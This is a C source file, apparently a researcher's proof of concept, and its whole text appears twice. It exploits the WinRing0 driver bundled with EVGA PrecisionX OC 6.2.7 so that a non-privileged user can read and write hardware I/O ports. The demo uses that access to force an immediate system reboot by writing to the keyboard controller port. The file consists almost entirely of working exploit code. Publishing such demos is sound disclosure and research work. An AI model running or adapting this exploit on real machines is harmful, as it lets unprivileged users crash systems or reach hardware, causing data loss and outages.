hfiref0x/wr0_demo1.c

## wr0_demo1.c
#include <windows.h>
#include <cstdio>

#define DEVICE_WR0_TYPE 40000
#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0")

HANDLE g_handleWR0 = INVALID_HANDLE_VALUE;

//
// Port mapped I/O access IOCTLS.
//

#define IOCTL_EVGA_WR0_WRITE_IO_PORT        CTL_CODE(DEVICE_WR0_TYPE, 0x832, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_EVGA_WR0_WRITE_IO_PORT_BYTE   CTL_CODE(DEVICE_WR0_TYPE, 0x836, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_EVGA_WR0_WRITE_IO_PORT_WORD   CTL_CODE(DEVICE_WR0_TYPE, 0x837, METHOD_BUFFERED, FILE_WRITE_ACCESS)
#define IOCTL_EVGA_WR0_WRITE_IO_PORT_DWORD  CTL_CODE(DEVICE_WR0_TYPE, 0x838, METHOD_BUFFERED, FILE_WRITE_ACCESS)

#define IOCTL_EVGA_WR0_READ_IO_PORT         CTL_CODE(DEVICE_WR0_TYPE, 0x831, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_EVGA_WR0_READ_IO_PORT_BYTE    CTL_CODE(DEVICE_WR0_TYPE, 0x833, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_EVGA_WR0_READ_IO_PORT_WORD    CTL_CODE(DEVICE_WR0_TYPE, 0x834, METHOD_BUFFERED, FILE_READ_ACCESS)
#define IOCTL_EVGA_WR0_READ_IO_PORT_DWORD   CTL_CODE(DEVICE_WR0_TYPE, 0x835, METHOD_BUFFERED, FILE_READ_ACCESS)


typedef struct  _WR0_WRITE_IO_PORT_INPUT {
    ULONG PortNumber;
    union {
        ULONG LongData;
        USHORT ShortData;
        UCHAR CharData;
    };
} WR0_WRITE_IO_PORT_INPUT, * PWR0_WRITE_IO_PORT_INPUT;


BYTE WINAPI READ_PORT_UCHAR(
    _In_ WORD PortNumber)
{
    DWORD   returnedLength = 0;
    WORD    valueRead = 0;

    if (DeviceIoControl(
        g_handleWR0,
        IOCTL_EVGA_WR0_READ_IO_PORT_BYTE,
        &PortNumber,
        sizeof(PortNumber),
        &valueRead,
        sizeof(valueRead),
        &returnedLength,
        NULL))
    {
        return (BYTE)valueRead;
    }

    return 0;
}

BOOL WRITE_PORT_UCHAR(
    _In_ ULONG PortNumber,
    _In_ UCHAR Byte
)
{
    ULONG writeBytes = 0;
    WR0_WRITE_IO_PORT_INPUT request;

    request.PortNumber = PortNumber;
    request.CharData = Byte;

    return DeviceIoControl(g_handleWR0,
        IOCTL_EVGA_WR0_WRITE_IO_PORT_BYTE,
        &request,
        sizeof(request),
        NULL,
        0,
        &writeBytes,
        NULL);
}

void DoReboot()
{
    WRITE_PORT_UCHAR(0x64, 0xFE);
}

BOOLEAN InitDriver()
{
    g_handleWR0 = CreateFile(WR0_DEVICE_LINK,
        GENERIC_READ | GENERIC_WRITE,
        0,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (g_handleWR0 == INVALID_HANDLE_VALUE) {
        printf_s("[!] Unable to open device\r\n");
        return FALSE;
    }
    return TRUE;
}

int Demo1()
{
    printf_s("EVGA PrecisionX OC 6.2.7 Non-privileged access to IO ports demo\r\n"\
        "This code will cause system reboot, press any key for reboot\r\n");

    system("pause");

    DoReboot();

    //
    // Never here.
    //
    CloseHandle(g_handleWR0);
    return 0;
}

int main()
{
    if (!InitDriver())
        return -1;

    return Demo1();
}
	#include <windows.h>
	#include <cstdio>

	#define DEVICE_WR0_TYPE 40000
	#define WR0_DEVICE_LINK TEXT("\\\\.\\WinRing0_1_2_0")

	HANDLE g_handleWR0 = INVALID_HANDLE_VALUE;

	//
	// Port mapped I/O access IOCTLS.
	//

	#define IOCTL_EVGA_WR0_WRITE_IO_PORT CTL_CODE(DEVICE_WR0_TYPE, 0x832, METHOD_BUFFERED, FILE_WRITE_ACCESS)
	#define IOCTL_EVGA_WR0_WRITE_IO_PORT_BYTE CTL_CODE(DEVICE_WR0_TYPE, 0x836, METHOD_BUFFERED, FILE_WRITE_ACCESS)
	#define IOCTL_EVGA_WR0_WRITE_IO_PORT_WORD CTL_CODE(DEVICE_WR0_TYPE, 0x837, METHOD_BUFFERED, FILE_WRITE_ACCESS)
	#define IOCTL_EVGA_WR0_WRITE_IO_PORT_DWORD CTL_CODE(DEVICE_WR0_TYPE, 0x838, METHOD_BUFFERED, FILE_WRITE_ACCESS)

	#define IOCTL_EVGA_WR0_READ_IO_PORT CTL_CODE(DEVICE_WR0_TYPE, 0x831, METHOD_BUFFERED, FILE_READ_ACCESS)
	#define IOCTL_EVGA_WR0_READ_IO_PORT_BYTE CTL_CODE(DEVICE_WR0_TYPE, 0x833, METHOD_BUFFERED, FILE_READ_ACCESS)
	#define IOCTL_EVGA_WR0_READ_IO_PORT_WORD CTL_CODE(DEVICE_WR0_TYPE, 0x834, METHOD_BUFFERED, FILE_READ_ACCESS)
	#define IOCTL_EVGA_WR0_READ_IO_PORT_DWORD CTL_CODE(DEVICE_WR0_TYPE, 0x835, METHOD_BUFFERED, FILE_READ_ACCESS)


	typedef struct _WR0_WRITE_IO_PORT_INPUT {
	ULONG PortNumber;
	union {
	ULONG LongData;
	USHORT ShortData;
	UCHAR CharData;
	};
	} WR0_WRITE_IO_PORT_INPUT, * PWR0_WRITE_IO_PORT_INPUT;


	BYTE WINAPI READ_PORT_UCHAR(
	_In_ WORD PortNumber)
	{
	DWORD returnedLength = 0;
	WORD valueRead = 0;

	if (DeviceIoControl(
	g_handleWR0,
	IOCTL_EVGA_WR0_READ_IO_PORT_BYTE,
	&PortNumber,
	sizeof(PortNumber),
	&valueRead,
	sizeof(valueRead),
	&returnedLength,
	NULL))
	{
	return (BYTE)valueRead;
	}

	return 0;
	}

	BOOL WRITE_PORT_UCHAR(
	_In_ ULONG PortNumber,
	_In_ UCHAR Byte
	)
	{
	ULONG writeBytes = 0;
	WR0_WRITE_IO_PORT_INPUT request;

	request.PortNumber = PortNumber;
	request.CharData = Byte;

	return DeviceIoControl(g_handleWR0,
	IOCTL_EVGA_WR0_WRITE_IO_PORT_BYTE,
	&request,
	sizeof(request),
	NULL,
	0,
	&writeBytes,
	NULL);
	}

	void DoReboot()
	{
	WRITE_PORT_UCHAR(0x64, 0xFE);
	}

	BOOLEAN InitDriver()
	{
	g_handleWR0 = CreateFile(WR0_DEVICE_LINK,
	GENERIC_READ \| GENERIC_WRITE,
	0,
	NULL,
	OPEN_EXISTING,
	0,
	NULL);

	if (g_handleWR0 == INVALID_HANDLE_VALUE) {
	printf_s("[!] Unable to open device\r\n");
	return FALSE;
	}
	return TRUE;
	}

	int Demo1()
	{
	printf_s("EVGA PrecisionX OC 6.2.7 Non-privileged access to IO ports demo\r\n"\
	"This code will cause system reboot, press any key for reboot\r\n");

	system("pause");

	DoReboot();

	//
	// Never here.
	//
	CloseHandle(g_handleWR0);
	return 0;
	}

	int main()
	{
	if (!InitDriver())
	return -1;

	return Demo1();
	}